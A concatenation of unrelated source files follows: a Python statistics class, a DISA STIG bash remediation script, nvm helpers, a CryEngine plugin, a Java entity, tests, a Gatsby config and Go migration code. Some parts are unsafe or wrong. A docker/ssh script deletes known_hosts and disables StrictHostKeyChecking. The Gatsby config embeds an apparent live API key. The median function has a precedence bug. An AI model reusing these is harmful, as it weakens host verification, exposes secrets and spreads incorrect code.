oxygen_pos = []
while len(queue):
item = queue.pop(0)
r = move(item[0], item[1], item[2])
if r != None:
oxygen_pos = r
flood = {tuple(oxygen_pos): 0}
print(fill(tuple(oxygen_pos), 0))
|
class StatsCalculator():
def __init__(self, arr):
self.arr = arr
# To calculate mean
def calculate_mean(self):
return (sum(self.arr)/len(self.arr))
# To calculate median
def calculate_median(self):
self.arr.sort()
if len(self.arr) % 2 == 0:
return (self.arr[int(len(self.arr)/2)] + self.arr[int(len(self.arr)/2 - 1)] / 2)
else:
return (self.arr[int(len(self.arr)/2)])
# To calculate mode
def calculate_mode(self):
counter = 0
num = self.arr[0]
for i in self.arr:
freq_num = self.arr.count(i)
if freq_num > counter:
counter = freq_num
num = i
return num
|
#Aqueduct - Compliance Remediation Content
#Copyright (C) 2011,2012 Vincent C. Passaro (vincent.passaro@gmail.com)
#
#This program is free software; you can redistribute it and/or
#modify it under the terms of the GNU General Public License
#as published by the Free Software Foundation; either version 2
#of the License, or (at your option) any later version.
#
#This program is distributed in the hope that it will be useful,
#but WITHOUT ANY WARRANTY; without even the implied warranty of
#MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
#GNU General Public License for more details.
#
#You should have received a copy of the GNU General Public License
#along with this program; if not, write to the Free Software
#Foundation, Inc., 51 Franklin Street, Fifth Floor,
#Boston, MA 02110-1301, USA.
#!/bin/bash
######################################################################
#By Tummy a.k.a Vincent C. Passaro #
#Vincent[.]Passaro[@]gmail[.]com #
#www.vincentpassaro.com #
######################################################################
#_____________________________________________________________________
#| Version | Change Information | Author | Date |
#|__________|_______________________|____________________|____________|
#| 1.0 | Initial Script | Vincent C. Passaro | 20-oct-2011|
#| | Creation | | |
#|__________|_______________________|____________________|____________|
#######################DISA INFORMATION###############################
#Group ID (Vulid): V-22573
#Group Title: GEN008340
#Rule ID: SV-26960r1_rule
#Severity: CAT II
#Rule Version (STIG-ID): GEN008340
#Rule Title: If the system is using LDAP for authentication or account information, the LDAP TLS key file must have mode 0600 or less permissive.
#
#Vulnerability Discussion: LDAP can be used to provide user authentication and account information, which are vital to system security. The LDAP client configuration must be protected from unauthorized modification.
#
#Note: Depending on the particular implementation, group and other read permission may be necessary for unprivileged users to successfully resolve account information using LDAP. This will still be a finding, as these permissions provide users with access to system authenticators.
#
#Responsibility: System Administrator
#IAControls: ECLP-1
#
#Check Content:
#Determine the key file.
# grep -i '^tls_key' /etc/ldap.conf
#Check the permissions.
# ls -lL <keypath>
#If the mode of the file is more permissive than 0600, this is a finding.
#
#Fix Text: Change the mode of the file.
#######################DISA INFORMATION###############################
#Global Variables#
PDI=GEN008340
[ -f /etc/ldap.conf ] || exit 0
#Start-Lockdown
TLSKEY=$( grep -i '^tls_key' /etc/ldap.conf | awk '{print $2}' )
for line in $TLSKEY
do
if [ -a $TLSKEY ]
then
# Pull the actual permissions
FILEPERMS=`stat -L --format='%04a' $TLSKEY`
# Break the actual file octal permissions up per entity
FILESPECIAL=${FILEPERMS:0:1}
FILEOWNER=${FILEPERMS:1:1}
FILEGROUP=${FILEPERMS:2:1}
FILEOTHER=${FILEPERMS:3:1}
# Run check by 'and'ing the unwanted mask(7377)
if [ $(($FILESPECIAL&7)) != "0" ] || [ $(($FILEOWNER&1)) != "0" ] || [ $(($FILEGROUP&7)) != "0" ] || [ $(($FILEOTHER&7)) != "0" ]
then
chmod u-x,g-rwxs,o-rwxt $TLSKEY
fi
fi
done
|
holy-dot src/ os install
nvm-dir() {
local dir
if tis-some $NVM_DIR; then
dir="$NVM_DIR"
elif [ -x "$(command -v brew)" ] && brewCheck nvm; then
# brew is installed, and nvm is installed with it (usually onMac)
# in this case brewOn is rather irrelevant
dir="$(brew --prefix nvm)"
else
# Linux or other not using brew
dir="$HOME"/.nvm
fi
# validate the nvm dir
if [ -s "$dir"/nvm.sh ]; then
echo "$dir" && true; return
else
false; return
fi
}
nvm-on() {
local dir="$(nvm-dir)"
if [ -d "$dir" ]; then
export NVM_DIR="$dir"
. "$NVM_DIR"/nvm.sh
[ -s "$NVM_DIR/bash_completion" ] && . "$NVM_DIR/bash_completion"
command -v nvm > /dev/null
else
>&2 echo "Not Found: nvm"
false; return
fi
}
# NOTE: If you're using zsh you can easily install nvm as a zsh plugin.
# Install zsh-nvm and run nvm upgrade to upgrade.
# https://github.com/lukechilds/zsh-nvm
# TODO: consider adding shell-dependent logic for install,
# plus upgrading the function below for using nvm upgrade if $SHELL is zsh
nvm-up() {
if tis-some $NVM_DIR; then
# https://github.com/nvm-sh/nvm#manual-upgrade
(
cd "$NVM_DIR"
git fetch --tags origin
git checkout `git describe --abbrev=0 --tags --match "v[0-9]*" \
$(git rev-list --tags --max-count=1)`
) && \. "$NVM_DIR/nvm.sh"
fi
}
|
<reponame>Aboutdept/Plugin_Videoplayer<gh_stars>1-10
/* Videoplayer_Plugin - for licensing and copyright see license.txt */
#include <StdAfx.h>
#include <IPluginVideoplayer.h>
#include <Nodes/G2FlowBaseNode.h>
#include <CPluginVideoplayer.h>
#include <CVideoplayerSystem.h>
namespace VideoplayerPlugin
{
class CFlowVideoOutput2DNode : public CFlowBaseNode<eNCT_Instanced>
{
private:
S2DVideo* m_p2DVideo;
enum EInputPorts
{
EIP_SHOW = 0,
EIP_HIDE,
EIP_VIDEOID,
EIP_SOUNDSOURCE,
EIP_RESIZEMODE,
EIP_CUSTOMAR,
EIP_REL_TOP,
EIP_REL_LEFT,
EIP_REL_WIDTH,
EIP_REL_HEIGHT,
EIP_ANGLE,
EIP_RGB,
EIP_ALPHA,
EIP_BG_RGB,
EIP_BG_ALPHA,
EIP_ZORDER,
};
public:
CFlowVideoOutput2DNode( SActivationInfo* pActInfo )
{
m_p2DVideo = NULL;
}
virtual ~CFlowVideoOutput2DNode()
{
if ( m_p2DVideo )
{
gVideoplayerSystem->Delete2DVideo( m_p2DVideo );
}
}
virtual IFlowNodePtr Clone( SActivationInfo* pActInfo )
{
return new CFlowVideoOutput2DNode( pActInfo );
}
virtual void GetMemoryUsage( ICrySizer* s ) const
{
s->Add( *this );
}
void Serialize( SActivationInfo* pActInfo, TSerialize ser )
{
}
virtual void GetConfiguration( SFlowNodeConfig& config )
{
static const SInputPortConfig inputs[] =
{
InputPortConfig_Void( "Show", _HELP( "Activate fullscreen" ) ),
InputPortConfig_Void( "Hide", _HELP( "Hide fullscreen" ) ),
InputPortConfig<int>( "VideoID", -1, _HELP( "id" ), "nVideoID" ),
InputPortConfig<bool>( "SoundSource", false, _HELP( "Output 2D Sound for this video" ), "bSoundSource" ),
InputPortConfig<int>( "ResizeMode", int( VRM_Default ), _HELP( "How should the video be resized to fit the screen" ), "nResizeMode", _UICONFIG( "enum_int:Original=0,Stretch=1,TouchInside=2,TouchOutside=3" ) ),
InputPortConfig<float>( "CustomAR", 0.0f, _HELP( "Custom Aspect Ratio (4:3=1.33 / 16:9=1.77)" ), "fCustomAR" ),
InputPortConfig<float>( "Top", 0.0f, _HELP( "Screen relative top" ), "fTop" ),
InputPortConfig<float>( "Left", 0.0f, _HELP( "Screen relative left" ), "fLeft" ),
InputPortConfig<float>( "Width", 1, _HELP( "Screen relative width" ), "fWidth" ),
InputPortConfig<float>( "Height", 1, _HELP( "Screen relative height" ), "fHeight" ),
InputPortConfig<float>( "Angle", 0, _HELP( "Angle" ), "fAngle" ),
InputPortConfig<Vec3>( "color_RGB", Vec3( 1, 1, 1 ), _HELP( "RGB " ), "fRGB", _UICONFIG( "" ) ),
InputPortConfig<float>( "Alpha", 1, _HELP( "Alpha" ), "fAlpha" ),
InputPortConfig<Vec3>( "color_BGRGB", Vec3( 0, 0, 0 ), _HELP( "Background RGB color" ), "fBG_RGB", _UICONFIG( "" ) ),
InputPortConfig<float>( "BGAlpha", 0, _HELP( "Alpha when set displays background to fill background" ), "fBG_Alpha" ),
InputPortConfig<int>( "ZOrder", int( VZP_Default ), _HELP( "When should the video be drawn" ), "nZOrder", _UICONFIG( "enum_int:BehindMenu=0,AboveMenu=1" ) ),
InputPortConfig_Null(),
};
config.pInputPorts = inputs;
config.pOutputPorts = NULL;
config.sDescription = _HELP( PLUGIN_CONSOLE_PREFIX "Videodestination/2D & Fullscreen" );
config.SetCategory( EFLN_APPROVED );
}
virtual void ProcessEvent( EFlowEvent evt, SActivationInfo* pActInfo )
{
switch ( evt )
{
case eFE_Suspend:
break;
case eFE_Resume:
break;
case eFE_Initialize:
break;
case eFE_Activate:
if ( IsPortActive( pActInfo, EIP_HIDE ) )
{
gVideoplayerSystem->Delete2DVideo( m_p2DVideo );
m_p2DVideo = NULL;
}
else if ( IsPortActive( pActInfo, EIP_SHOW ) )
{
if ( !m_p2DVideo )
{
m_p2DVideo = gVideoplayerSystem->Create2DVideo();
}
if ( m_p2DVideo )
{
// Set all properties
m_p2DVideo->SetSoundsource( GetPortBool( pActInfo, EIP_SOUNDSOURCE ) );
m_p2DVideo->SetVideo( gVideoplayerSystem->GetVideoplayerById( GetPortInt( pActInfo, EIP_VIDEOID ) ) );
m_p2DVideo->nResizeMode = eResizeMode( GetPortInt( pActInfo, EIP_RESIZEMODE ) );
m_p2DVideo->fCustomAR = GetPortFloat( pActInfo, EIP_CUSTOMAR );
m_p2DVideo->fRelTop = GetPortFloat( pActInfo, EIP_REL_TOP );
m_p2DVideo->fRelLeft = GetPortFloat( pActInfo, EIP_REL_LEFT );
m_p2DVideo->fRelWidth = GetPortFloat( pActInfo, EIP_REL_WIDTH );
m_p2DVideo->fRelHeight = GetPortFloat( pActInfo, EIP_REL_HEIGHT );
m_p2DVideo->fAngle = GetPortFloat( pActInfo, EIP_ANGLE );
m_p2DVideo->cRGBA = ColorF( GetPortVec3( pActInfo, EIP_RGB ), GetPortFloat( pActInfo, EIP_ALPHA ) );
m_p2DVideo->cBG_RGBA = ColorF( GetPortVec3( pActInfo, EIP_BG_RGB ), GetPortFloat( pActInfo, EIP_BG_ALPHA ) );
m_p2DVideo->nZPos = eZPos( GetPortInt( pActInfo, EIP_ZORDER ) );
}
}
else if ( m_p2DVideo )
{
// Set changed properties
if ( IsPortActive( pActInfo, EIP_SOUNDSOURCE ) || IsPortActive( pActInfo, EIP_SHOW ) )
{
m_p2DVideo->SetSoundsource( GetPortBool( pActInfo, EIP_SOUNDSOURCE ) );
}
if ( IsPortActive( pActInfo, EIP_VIDEOID ) || IsPortActive( pActInfo, EIP_SHOW ) )
{
m_p2DVideo->SetVideo( gVideoplayerSystem->GetVideoplayerById( GetPortInt( pActInfo, EIP_VIDEOID ) ) );
}
if ( IsPortActive( pActInfo, EIP_RESIZEMODE ) )
{
m_p2DVideo->nResizeMode = eResizeMode( GetPortInt( pActInfo, EIP_RESIZEMODE ) );
}
if ( IsPortActive( pActInfo, EIP_CUSTOMAR ) )
{
m_p2DVideo->fCustomAR = GetPortFloat( pActInfo, EIP_CUSTOMAR );
}
if ( IsPortActive( pActInfo, EIP_REL_TOP ) )
{
m_p2DVideo->fRelTop = GetPortFloat( pActInfo, EIP_REL_TOP );
}
if ( IsPortActive( pActInfo, EIP_REL_LEFT ) )
{
m_p2DVideo->fRelLeft = GetPortFloat( pActInfo, EIP_REL_LEFT );
}
if ( IsPortActive( pActInfo, EIP_REL_WIDTH ) )
{
m_p2DVideo->fRelWidth = GetPortFloat( pActInfo, EIP_REL_WIDTH );
}
if ( IsPortActive( pActInfo, EIP_REL_HEIGHT ) )
{
m_p2DVideo->fRelHeight = GetPortFloat( pActInfo, EIP_REL_HEIGHT );
}
if ( IsPortActive( pActInfo, EIP_ANGLE ) )
{
m_p2DVideo->fAngle = GetPortFloat( pActInfo, EIP_ANGLE );
}
if ( IsPortActive( pActInfo, EIP_RGB ) )
{
m_p2DVideo->cRGBA = ColorF( GetPortVec3( pActInfo, EIP_RGB ), GetPortFloat( pActInfo, EIP_ALPHA ) );
}
if ( IsPortActive( pActInfo, EIP_ALPHA ) )
{
m_p2DVideo->cRGBA.a = GetPortFloat( pActInfo, EIP_ALPHA );
}
if ( IsPortActive( pActInfo, EIP_BG_RGB ) )
{
m_p2DVideo->cBG_RGBA = ColorF( GetPortVec3( pActInfo, EIP_BG_RGB ), GetPortFloat( pActInfo, EIP_BG_ALPHA ) );
}
if ( IsPortActive( pActInfo, EIP_BG_ALPHA ) )
{
m_p2DVideo->cBG_RGBA.a = GetPortFloat( pActInfo, EIP_BG_ALPHA );
}
if ( IsPortActive( pActInfo, EIP_BG_ALPHA ) )
{
m_p2DVideo->nZPos = eZPos( GetPortInt( pActInfo, EIP_ZORDER ) );
}
}
break;
case eFE_Update:
break;
}
}
};
}
REGISTER_FLOW_NODE_EX( "Videoplayer_Plugin:Output2D", VideoplayerPlugin::CFlowVideoOutput2DNode, CFlowVideoOutput2DNode );
|
<gh_stars>1-10
package fr.syncrase.ecosyst.domain;
import com.fasterxml.jackson.annotation.JsonIgnoreProperties;
import io.swagger.annotations.ApiModel;
import java.io.Serializable;
import javax.persistence.*;
import org.hibernate.annotations.Cache;
import org.hibernate.annotations.CacheConcurrencyStrategy;
/**
* Pour que la ressemblance soit réflexive il faut l'enregistrer 2 fois. Car si la ressemblance A ressemble à B est enregistrée, alors B ne ressemble pas à A
*/
@ApiModel(
description = "Pour que la ressemblance soit réflexive il faut l'enregistrer 2 fois. Car si la ressemblance A ressemble à B est enregistrée, alors B ne ressemble pas à A"
)
@Entity
@Table(name = "ressemblance")
@Cache(usage = CacheConcurrencyStrategy.READ_WRITE)
public class Ressemblance implements Serializable {
private static final long serialVersionUID = 1L;
@Id
@GeneratedValue(strategy = GenerationType.SEQUENCE, generator = "sequenceGenerator")
@SequenceGenerator(name = "sequenceGenerator")
@Column(name = "id")
private Long id;
@Column(name = "description")
private String description;
@ManyToOne
@JsonIgnoreProperties(
value = {
"confusions",
"ensoleillements",
"plantesPotageres",
"cycleDeVie",
"sol",
"temperature",
"racine",
"strate",
"feuillage",
"nomsVernaculaires",
"classificationCronquist",
"planteBotanique",
},
allowSetters = true
)
private Plante planteRessemblant;
// jhipster-needle-entity-add-field - JHipster will add fields here
public Long getId() {
return this.id;
}
public Ressemblance id(Long id) {
this.setId(id);
return this;
}
public void setId(Long id) {
this.id = id;
}
public String getDescription() {
return this.description;
}
public Ressemblance description(String description) {
this.setDescription(description);
return this;
}
public void setDescription(String description) {
this.description = description;
}
public Plante getPlanteRessemblant() {
return this.planteRessemblant;
}
public void setPlanteRessemblant(Plante plante) {
this.planteRessemblant = plante;
}
public Ressemblance planteRessemblant(Plante plante) {
this.setPlanteRessemblant(plante);
return this;
}
// jhipster-needle-entity-add-getters-setters - JHipster will add getters and setters here
@Override
public boolean equals(Object o) {
if (this == o) {
return true;
}
if (!(o instanceof Ressemblance)) {
return false;
}
return id != null && id.equals(((Ressemblance) o).id);
}
@Override
public int hashCode() {
// see https://vladmihalcea.com/how-to-implement-equals-and-hashcode-using-the-jpa-entity-identifier/
return getClass().hashCode();
}
// prettier-ignore
@Override
public String toString() {
return "Ressemblance{" +
"id=" + getId() +
", description='" + getDescription() + "'" +
"}";
}
}
|
import { expect } from "chai";
import { spawn } from "child_process";
import {
SOM, HandleStoppedAndGetStackTrace, TestConnection, execSom,
expectStack
} from "./test-setup";
describe("Command-line Behavior", function() {
it("should show help", done => {
let sawOutput = false;
const somProc = spawn(SOM, ["-h"]);
somProc.stdout.on("data", (_data) => { sawOutput = true; });
somProc.on("exit", (code) => {
expect(sawOutput).to.be.true;
expect(code).to.equal(0);
done();
});
});
});
describe("Stack trace output", () => {
it("should be correct for #doesNotUnderstand", () => {
const result = execSom(["dnu"]);
expect(result.output[1].toString().replace(/\d/g, "")).to.equal("Stack Trace\n\
\tPlatform>>#start Platform.ns::\n\
\tBlock>>#on:do: Kernel.ns::\n\
\tvmMirror>>#exceptionDo:catch:onException: ExceptionDoOnPrimFactory::\n\
\tPlatform>>#λstart@@ Platform.ns::\n\
\tPingPongApp>>#main: pingpong.ns::\n\
\tPingPongApp>>#testDNU pingpong.ns::\n\
ERROR: MessageNotUnderstood(Integer>>#foobar)\n");
});
it("should be correct for `system printStackTrace`", () => {
const result = execSom(["stack"]);
expect(result.output[1].toString().replace(/\d/g, "")).to.equal("Stack Trace\n\
\tPlatform>>#start Platform.ns::\n\
\tBlock>>#on:do: Kernel.ns::\n\
\tvmMirror>>#exceptionDo:catch:onException: ExceptionDoOnPrimFactory::\n\
\tPlatform>>#λstart@@ Platform.ns::\n\
\tPingPongApp>>#main: pingpong.ns::\n\
\tPingPongApp>>#testPrintStackTrace pingpong.ns::\n");
});
});
describe("Language Debugger Integration", function() {
let conn: TestConnection;
let ctrl: HandleStoppedAndGetStackTrace;
const closeConnectionAfterSuite = (done) => {
conn.fullyConnected.then(_ => { conn.close(done); });
conn.fullyConnected.catch(reason => done(reason));
};
describe("execute `1 halt` and get suspended event", () => {
before("Start SOMns and Connect", () => {
conn = new TestConnection(["halt"]);
ctrl = new HandleStoppedAndGetStackTrace([], conn, conn.fullyConnected);
});
after(closeConnectionAfterSuite);
it("should halt on expected source section", () => {
return ctrl.stackPs[0].then(msg => {
expectStack(msg.stackFrames, 6, "PingPongApp>>#testHalt", 106);
});
});
});
});
|
<reponame>ticlo/server-example<filename>src/route-example/main.ts
import Express from 'express';
import {Root} from '@ticlo/core';
import {connectTiclo, routeTiclo, getEditorUrl} from '@ticlo/express';
import {FileJobLoader} from '@ticlo/node';
// save load jobs from the same folder
Root.instance.setLoader(new FileJobLoader('./src/route-example'));
let app = Express();
connectTiclo(app, '');
routeTiclo(app, '/ticlo');
app.listen(8011);
console.log(getEditorUrl('ws://127.0.0.1:8011', 'static-route'));
|
ssh-add -L > ~/myhost/authorized_keys
docker rm builder_sonic -f 2>&1 >> /dev/null
docker run -d --name builder_sonic -it -v $HOME/myhost:/myhost \
-p 5002:22 \
--hostname sonic \
builders_sonic
# -v /run/host-services/ssh-auth.sock:/run/host-services/ssh-auth.sock -e SSH_AUTH_SOCK="/run/host-services/ssh-auth.sock" \
#UGLY HACK to remove know hosts file
rm -f ~/.ssh/known_hosts
sleep 0.6
if [ "$1" ]; then
exit 0
else
ssh -A -o "StrictHostKeyChecking=no" root@localhost -p 5002
fi
|
<reponame>amurrill/Gatsby-Weather-App
module.exports = {
siteMetadata: {
title: `Gatsby Starter Weather - DarkSky and OpenWeather`,
/* pathPrefix: '/static-gatsby-weather',*/
},
plugins: [
{
resolve: `gatsby-plugin-manifest`,
options: {
name: `Gatsby-starter-weather`,
short_name: `GatsbySW`,
start_url: `/`,
background_color: `#6b37bf`,
theme_color: `#6b37bf`,
display: `standalone`,
icon: `src/images/cloudy.png`, // This path is relative to the root of the site.
},
},
'gatsby-plugin-offline',
{
resolve: 'gatsby-source-openweathermap',
options: {
apikey: 'b836e6879a0aee23a9de2c7e84fdd19a',
location: 'Seminole, Florida',
units: 'imperial',
type: 'weather'
},
},
{
resolve: 'gatsby-source-darksky',
options: {
key: '<KEY>',
latitude: '39.791000',
longitude: '-86.148003',
exclude: ['minutely']
},
}
]
}
|
package scmigration
import (
"bytes"
"encoding/json"
"fmt"
"net/http"
"strings"
"github.com/SAP/sap-btp-service-operator/api/v1alpha1"
"github.com/SAP/sap-btp-service-operator/client/sm"
"github.com/SAP/sap-btp-service-operator/client/sm/types"
"github.com/kyma-incubator/reconciler/pkg/reconciler/instances/scmigration/apis/servicecatalog/v1beta1"
"github.com/kyma-incubator/reconciler/pkg/reconciler/service"
corev1 "k8s.io/api/core/v1"
"k8s.io/apimachinery/pkg/api/errors"
metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
"k8s.io/apimachinery/pkg/runtime"
"k8s.io/client-go/kubernetes"
"k8s.io/client-go/rest"
"k8s.io/client-go/tools/clientcmd"
"k8s.io/kubectl/pkg/scheme"
)
// It was decided that this reconciler should reuse code from sap-btp-service-operator-migration application
// This file contains copy of unnexported code from the sap-btp-service-operator-migration and improved
// logging with error handling. The migration logic remains unmodified.
// https://github.com/SAP/sap-btp-service-operator-migration/blob/v0.1.2/migrate/migrator.go
const (
migratedLabel = "migrated"
serviceInstances = "serviceinstances"
serviceBindings = "servicebindings"
)
type serviceInstancePair struct {
svcatInstance *v1beta1.ServiceInstance
smInstance *types.ServiceInstance
}
type serviceBindingPair struct {
svcatBinding *v1beta1.ServiceBinding
smBinding *types.ServiceBinding
}
type object interface {
metav1.Object
runtime.Object
}
type migrator struct {
SMClient sm.Client
SvcatRestClient *rest.RESTClient
SapOperatorRestClient *rest.RESTClient
ClientSet *kubernetes.Clientset
ClusterID string
Services map[string]types.ServiceOffering
Plans map[string]types.ServicePlan
ac *service.ActionContext
}
func newMigrator(ac *service.ActionContext) (*migrator, error) {
ctx := ac.Context
namespace := ac.Task.Namespace
cfg, err := clientcmd.RESTConfigFromKubeConfig([]byte(ac.KubeClient.Kubeconfig()))
if err != nil {
return nil, err
}
cs, err := kubernetes.NewForConfig(cfg)
if err != nil {
return nil, err
}
err = v1alpha1.AddToScheme(scheme.Scheme)
if err != nil {
return nil, err
}
secret, err := cs.CoreV1().Secrets(namespace).Get(ctx, "sap-btp-service-operator", metav1.GetOptions{})
if err != nil {
return nil, fmt.Errorf("failed to get Secret %v/sap-btp-service-operator: %w", namespace, err)
}
configMap, err := cs.CoreV1().ConfigMaps(namespace).Get(ctx, "sap-btp-operator-config", metav1.GetOptions{})
if err != nil {
return nil, fmt.Errorf("failed to get ConfigMap %v/sap-btp-operator-config: %w", namespace, err)
}
smClient, err := getSMClient(ctx, secret)
if err != nil {
return nil, fmt.Errorf("failed to instantiate SMClient with secret %v/%v: %w", secret.Namespace, secret.Name, err)
}
services, err := getServices(smClient)
if err != nil {
return nil, fmt.Errorf("failed to get SM services: %w", err)
}
plans, err := getPlans(smClient)
if err != nil {
return nil, fmt.Errorf("failed to get SM plans: %w", err)
}
migrator := &migrator{
ac: ac,
SMClient: smClient,
SvcatRestClient: getK8sClient(cfg, svCatGroupName, svCatGroupVersion),
SapOperatorRestClient: getK8sClient(cfg, operatorGroupName, operatorGroupVersion),
ClientSet: cs,
ClusterID: configMap.Data["CLUSTER_ID"],
Services: services,
Plans: plans,
}
return migrator, nil
}
func getPlans(smclient sm.Client) (map[string]types.ServicePlan, error) {
plans, err := smclient.ListPlans(nil)
if err != nil {
return nil, err
}
res := make(map[string]types.ServicePlan)
for _, plan := range plans.ServicePlans {
res[plan.ID] = plan
}
return res, nil
}
func getServices(smclient sm.Client) (map[string]types.ServiceOffering, error) {
services, err := smclient.ListOfferings(nil)
if err != nil {
return nil, err
}
res := make(map[string]types.ServiceOffering)
for _, svc := range services.ServiceOfferings {
res[svc.ID] = svc
}
return res, nil
}
func (m *migrator) migrateBTPOperator() error {
parameters := &sm.Parameters{
FieldQuery: []string{
fmt.Sprintf("context/clusterid eq '%s'", m.ClusterID),
},
}
smInstances, err := m.SMClient.ListInstances(parameters)
if err != nil {
return err
}
m.ac.Logger.Infof("Fetched %v instances from SM", len(smInstances.ServiceInstances))
smBindings, err := m.SMClient.ListBindings(parameters)
if err != nil {
return err
}
m.ac.Logger.Infof("Fetched %v bindings from SM", len(smBindings.ServiceBindings))
ctx := m.ac.Context
svcatInstances := v1beta1.ServiceInstanceList{}
err = m.SvcatRestClient.Get().Namespace("").Resource(serviceInstances).Do(ctx).Into(&svcatInstances)
if err != nil && !errors.IsNotFound(err) {
return err
}
m.ac.Logger.Infof("Fetched %v svcat instances from cluster", len(svcatInstances.Items))
svcatBindings := v1beta1.ServiceBindingList{}
err = m.SvcatRestClient.Get().Namespace("").Resource(serviceBindings).Do(ctx).Into(&svcatBindings)
if err != nil && !errors.IsNotFound(err) {
return err
}
m.ac.Logger.Infof("Fetched %v svcat bindings from cluster", len(svcatBindings.Items))
m.ac.Logger.Infof("Preparing resources")
instancesToMigrate := m.getInstancesToMigrate(smInstances, svcatInstances)
bindingsToMigrate := m.getBindingsToMigrate(smBindings, svcatBindings)
if len(instancesToMigrate) == 0 && len(bindingsToMigrate) == 0 {
m.ac.Logger.Infof("no svcat instances or bindings found for migration")
return nil
}
m.ac.Logger.Infof("found %d instances and %d bindings to migrate", len(instancesToMigrate), len(bindingsToMigrate))
var failuresBuffer bytes.Buffer
for _, pair := range instancesToMigrate {
err := m.migrateInstance(pair)
if err != nil {
m.ac.Logger.Error(err)
failuresBuffer.WriteString(err.Error() + "\n")
}
}
for _, pair := range bindingsToMigrate {
err := m.migrateBinding(pair)
if err != nil {
m.ac.Logger.Error(err)
failuresBuffer.WriteString(err.Error() + "\n")
}
}
if failuresBuffer.Len() == 0 {
m.ac.Logger.Infof("Migration completed successfully")
} else {
m.ac.Logger.Errorf("Migration failures summary: %v", failuresBuffer.String())
return fmt.Errorf(failuresBuffer.String())
}
return nil
}
func (m *migrator) getInstancesToMigrate(smInstances *types.ServiceInstances, svcatInstances v1beta1.ServiceInstanceList) []serviceInstancePair {
validInstances := make([]serviceInstancePair, 0)
for _, svcat := range svcatInstances.Items {
var smInstance *types.ServiceInstance
for i, instance := range smInstances.ServiceInstances {
if instance.ID == svcat.Spec.ExternalID {
smInstance = &smInstances.ServiceInstances[i]
break
}
}
if smInstance == nil {
m.ac.Logger.Infof("svcat instance name '%s' id '%s' (%s) not found in SM, skipping it...", svcat.Name, svcat.Spec.ExternalID, svcat.Name)
continue
}
svcInstance := svcat
validInstances = append(validInstances, serviceInstancePair{
svcatInstance: &svcInstance,
smInstance: smInstance,
})
}
return validInstances
}
func (m *migrator) getBindingsToMigrate(smBindings *types.ServiceBindings, svcatBindings v1beta1.ServiceBindingList) []serviceBindingPair {
validBindings := make([]serviceBindingPair, 0)
for _, svcat := range svcatBindings.Items {
var smBinding *types.ServiceBinding
for i, binding := range smBindings.ServiceBindings {
if binding.ID == svcat.Spec.ExternalID {
smBinding = &smBindings.ServiceBindings[i]
break
}
}
if smBinding == nil {
m.ac.Logger.Infof("svcat binding name '%s' id '%s' (%s) not found in SM, skipping it...", svcat.Name, svcat.Spec.ExternalID, svcat.Name)
continue
}
svcBinding := svcat
validBindings = append(validBindings, serviceBindingPair{
svcatBinding: &svcBinding,
smBinding: smBinding,
})
}
return validBindings
}
func (m *migrator) migrateInstance(pair serviceInstancePair) error {
m.ac.Logger.Infof("migrating service instance '%s' in namespace '%s' (smID: '%s')", pair.svcatInstance.Name, pair.svcatInstance.Namespace, pair.svcatInstance.Spec.ExternalID)
//set k8s label
requestBody := fmt.Sprintf(`{"k8sname": "%s"}`, pair.svcatInstance.Name)
buffer := bytes.NewBuffer([]byte(requestBody))
response, err := m.SMClient.Call(http.MethodPut, fmt.Sprintf("/v1/migrate/service_instances/%s", pair.smInstance.ID), buffer, &sm.Parameters{})
if err != nil || response.StatusCode != http.StatusOK {
if response != nil {
m.ac.Logger.Errorf("received statusCode %v", response.StatusCode)
}
return fmt.Errorf("failed to add k8s label to service instance name: %s, ID: %s", pair.smInstance.Name, pair.smInstance.ID)
}
instance := m.getInstanceStruct(pair)
res := &v1alpha1.ServiceInstance{}
err = m.SapOperatorRestClient.Post().
Namespace(pair.svcatInstance.Namespace).
Resource(serviceInstances).
Body(instance).
Do(m.ac.Context).
Into(res)
if err = m.ignoreAlreadyMigrated(instance, res, err); err != nil {
return fmt.Errorf("failed to create service instance: %v", err.Error())
}
m.ac.Logger.Infof("instance migrated successfully")
return nil
}
func (m *migrator) migrateBinding(pair serviceBindingPair) error {
m.ac.Logger.Infof("migrating service binding '%s' in namespace '%s' (smID: '%s')", pair.svcatBinding.Name, pair.svcatBinding.Namespace, pair.svcatBinding.Spec.ExternalID)
secretExists := true
secret, err := m.ClientSet.CoreV1().Secrets(pair.svcatBinding.Namespace).Get(m.ac.Context, pair.svcatBinding.Spec.SecretName, metav1.GetOptions{})
if err != nil {
if errors.IsNotFound(err) {
m.ac.Logger.Infof("Info: secret named '%s' not found for binding", pair.svcatBinding.Spec.SecretName)
secretExists = false
} else {
return fmt.Errorf("failed to get binding's secret, skipping binding migration. Error: %v", err.Error())
}
}
//add k8sname label and save credentials
requestBody, err := m.getMigrateBindingRequestBody(pair.svcatBinding.Name, secret)
if err != nil {
return fmt.Errorf("failed to build request body for migrating instance. Error: %v", err.Error())
}
buffer := bytes.NewBuffer([]byte(requestBody))
response, err := m.SMClient.Call(http.MethodPut, fmt.Sprintf("/v1/migrate/service_bindings/%s", pair.smBinding.ID), buffer, &sm.Parameters{})
if err != nil || response.StatusCode != http.StatusOK {
return fmt.Errorf("failed to add k8s label to service binding name: %s, ID: %s", pair.smBinding.Name, pair.smBinding.ID)
}
if secretExists {
//add 'binding' label to secret
if secret.Labels == nil {
secret.Labels = make(map[string]string, 1)
}
secret.Labels["binding"] = pair.svcatBinding.Name
secret, err = m.ClientSet.CoreV1().Secrets(secret.Namespace).Update(m.ac.Context, secret, metav1.UpdateOptions{})
if err != nil {
return fmt.Errorf("failed to add label to binding. Error: %v", err.Error())
}
}
binding := m.getBindingStruct(pair)
res := &v1alpha1.ServiceBinding{}
err = m.SapOperatorRestClient.Post().
Namespace(binding.Namespace).
Resource(serviceBindings).
Body(binding).
Do(m.ac.Context).
Into(res)
if err = m.ignoreAlreadyMigrated(binding, res, err); err != nil {
return fmt.Errorf("failed to create service binding: %v", err.Error())
}
if secretExists {
//set the new binding as owner reference for the secret
t := true
owner := metav1.OwnerReference{
APIVersion: res.APIVersion,
Kind: res.Kind,
Name: res.Name,
UID: res.UID,
Controller: &t,
BlockOwnerDeletion: &t,
}
secret.OwnerReferences = []metav1.OwnerReference{owner}
_, err = m.ClientSet.CoreV1().Secrets(secret.Namespace).Update(m.ac.Context, secret, metav1.UpdateOptions{})
if err != nil {
return fmt.Errorf("failed to set new binding as owner of secret. Error: %v", err.Error())
}
}
m.ac.Logger.Infof("binding migrated successfully")
return nil
}
